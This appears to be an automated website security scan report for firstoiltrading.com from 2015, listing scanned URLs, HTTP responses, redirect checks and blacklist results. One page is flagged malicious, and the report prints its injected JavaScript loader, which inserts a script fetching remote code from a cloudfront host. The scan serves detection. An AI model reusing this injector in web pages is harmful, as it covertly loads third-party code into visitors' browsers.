Scanned pages/files
Request | Server response | Status |
http://firstoiltrading.com/jp/doc | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 03 Mar 2015 11:57:57 GMT Location: http://firstoiltrading.com/jp/doc/ Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Content-Length: 430 Content-Type: text/html; charset=iso-8859-1 | clean |
http://firstoiltrading.com/jp/doc/ | 200 OK Content-Length: 13938 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (typeof _GPL_16_loaded == 'undefined') && (_GPL_16_loaded=true) && (_GPL_i=document.getElementsByTagName('head')) && (_GPL_i=(_GPL_i.length>0)?_GPL_i:document.getElementsByTagName('body')) && (_GPL_i.length>0) && (_GPL_j=document.createElement('script')) && (_GPL_j.async=true) && (_GPL_j.type='text/javascript') && (_GPL_j.src='https://d3lvr7yuk4uaui.cloudfront.net/items/loaders/loader_16.js?pid=16&zoneid=7818&cid=US&rid=NV&ccid=Fernley&ip=199.48.177.231&aoi=1316649369') && (_GPL_i[0].appendChild(_GPL_j)) Antivirus reports:
| ||
http://firstoiltrading.com/test404page.js | 200 OK Content-Length: 113 Content-Type: text/html | clean |
http://autollopart.com/stooper.php?id=100836 | HTTP/1.1 302 Found Connection: close Date: Tue, 03 Mar 2015 11:58:03 GMT Location: http://bing.com Server: Apache/2.4.10 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4 Content-Type: text/html X-Powered-By: PHP/5.4.35 | clean |
http://bing.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache Date: Tue, 03 Mar 2015 11:58:04 GMT Location: http://www.bing.com/ Server: Microsoft-IIS/8.5 Content-Length: 0 Edge-Control: no-store P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND" Set-Cookie: _HOP=I=1&TS=1425383885; domain=bing.com; path=/ X-MSEdge-Ref: Ref A: 9F41B3DE9DBA41D19C14750733A98F51 Ref B: 3ADCF9F9595BB32E4F9CF21FF9A85300 Ref C: Tue Mar 03 03:58:05 2015 PST | clean |
http://www.bing.com/ | 200 OK Content-Length: 57048 Content-Type: text/html | clean |
http://www.bing.com/?scope=web&FORM=Z9LH | 200 OK Content-Length: 57164 Content-Type: text/html | clean |
http://www.bing.com/?scope=images&FORM=Z9LH1 | 200 OK Content-Length: 57181 Content-Type: text/html | clean |
http://www.bing.com/?scope=video&FORM=Z9LH2 | 200 OK Content-Length: 57176 Content-Type: text/html | clean |
http://www.bing.com/news?FORM=Z9LH3 | 200 OK Content-Length: 88992 Content-Type: text/html | clean |
http://www.bing.com/rms/rms%20answers%20News%20Vertical$newsSmartRefresh/jc/06505c61/092426a2.js?y | 200 OK Content-Length: 674 Content-Type: application/x-javascript | clean |
http://www.bing.com/rms/news4B/jc/f44b81d8/0e31551f.js?bu=rms+answers+News+Vertical%24domready%2cVertical%24newsBrowseCommonV6%2cVertical%24scroller%2cVertical%24baseInst%2cVertical%24makehomepage&y | 200 OK Content-Length: 11956 Content-Type: application/x-javascript | clean |
http://www.bing.com/search?q=&FORM=HDRSC1 | HTTP/1.1 302 Found Cache-Control: private Date: Tue, 03 Mar 2015 11:58:07 GMT Location: /?scope=web&mkt=en-ww&FORM=HDRSC1 Server: Microsoft-IIS/8.5 Vary: Accept-Encoding Content-Length: 158 Content-Type: text/html; charset=utf-8 Edge-Control: no-store P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND" Set-Cookie: _FS=NU=1; domain=.bing.com; path=/ Set-Cookie: _HOP=I=1&TS=1425383887; domain=.bing.com; path=/ Set-Cookie: _SS=SID=67DCD38D968E4CFF845E0846C9966F92; domain=.bing.com; path=/ Set-Cookie: SRCHD=AF=HDRSC1; expires=Thu, 02-Mar-2017 11:58:07 GMT; domain=.bing.com; path=/ Set-Cookie: SRCHUID=V=2&GUID=9C3C653D4EEF4D508F4F5D53BB7609D0; expires=Thu, 02-Mar-2017 11:58:07 GMT; path=/ Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20150303; expires=Thu, 02-Mar-2017 11:58:07 GMT; domain=.bing.com; path=/ Set-Cookie: _EDGE_S=F=1&SID=2AF0D4CB835867693619D39482BC66DC; path=/; httponly; domain=bing.com Set-Cookie: _EDGE_V=1; path=/; httponly; expires=Thu, 02-Mar-2017 11:58:07 GMT; domain=bing.com Set-Cookie: MUID=23C9A56BC14B604218E7A234C0AF611D; path=/; expires=Thu, 02-Mar-2017 11:58:07 GMT; domain=bing.com Set-Cookie: MUIDB=23C9A56BC14B604218E7A234C0AF611D; path=/; httponly; expires=Thu, 02-Mar-2017 11:58:07 GMT X-MSEdge-Ref: Ref A: E902875AB5FE486284F8ED9EE1814380 Ref B: CB174FBE0E0A048985278ABCE1BC1A00 Ref C: Tue Mar 03 03:58:07 2015 PST | clean |
http://www.bing.com/?scope=web&mkt=en-ww&form=hdrsc1 | 200 OK Content-Length: 57210 Content-Type: text/html | clean |
http://www.bing.com/explore?FORM=Z9LH4 | 200 OK Content-Length: 28508 Content-Type: text/html | clean |
http://www.bing.com/images/search?q=&FORM=HDRSC2 | HTTP/1.1 302 Found Cache-Control: private Date: Tue, 03 Mar 2015 11:58:07 GMT Location: /?scope=images&nr=1&FORM=NOFORM Server: Microsoft-IIS/8.5 Vary: Accept-Encoding Content-Length: 156 Content-Type: text/html; charset=utf-8 Edge-Control: no-store P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND" Set-Cookie: _FS=NU=1; domain=.bing.com; path=/ Set-Cookie: _HOP=I=1&TS=1425383888; domain=.bing.com; path=/ Set-Cookie: _SS=SID=26098760A9E344779E89861EDFB533AD; domain=.bing.com; path=/ Set-Cookie: SRCHD=AF=HDRSC2; expires=Thu, 02-Mar-2017 11:58:08 GMT; domain=.bing.com; path=/ Set-Cookie: SRCHUID=V=2&GUID=DC3DB63363EF485D85319746D2F820C9; expires=Thu, 02-Mar-2017 11:58:08 GMT; path=/ Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20150303; expires=Thu, 02-Mar-2017 11:58:08 GMT; domain=.bing.com; path=/ Set-Cookie: _EDGE_S=F=1&SID=15EF2EFBA53E61AE24BF29A4A4DA6042; path=/; httponly; domain=bing.com Set-Cookie: _EDGE_V=1; path=/; httponly; expires=Thu, 02-Mar-2017 11:58:08 GMT; domain=bing.com Set-Cookie: MUID=1A7A508B9456653C14B857D495B2642A; path=/; expires=Thu, 02-Mar-2017 11:58:08 GMT; domain=bing.com Set-Cookie: MUIDB=1A7A508B9456653C14B857D495B2642A; path=/; httponly; expires=Thu, 02-Mar-2017 11:58:08 GMT X-MSEdge-Ref: Ref A: 042C1C0E7612404DB9AFCC7601144AEF Ref B: B5993FBBE8009020004A4796E5B37C54 Ref C: Tue Mar 03 03:58:08 2015 PST | clean |
http://www.bing.com/?scope=images&nr=1&form=noform | 200 OK Content-Length: 57210 Content-Type: text/html | clean |
http://www.bing.com/account/general?ru=http%3a%2f%2fwww.bing.com%3a80%2f%3fscope%3dimages%26nr%3d1%26form%3dnoform&FORM=SEFD | 200 OK Content-Length: 46647 Content-Type: text/html | clean |
http://www.bing.com/?FORM=HDRHME&pq= | 200 OK Content-Length: 57096 Content-Type: text/html | clean |
http://www.bing.com/account/general?ru=http%3a%2f%2fwww.bing.com%3a80%2f%3fFORM%3dHDRHME%26pq%3d&FORM=SEFD | 200 OK Content-Length: 46481 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: firstoiltrading.com
Result:
GET / HTTP/1.1
Host: firstoiltrading.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: firstoiltrading.com
Referer: http://www.google.com/search?q=firstoiltrading.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: firstoiltrading.com
Referer: http://www.google.com/search?q=firstoiltrading.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=firstoiltrading.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://firstoiltrading.com/
Result: firstoiltrading.com is not infected or malware details are not published yet.
Result: firstoiltrading.com is not infected or malware details are not published yet.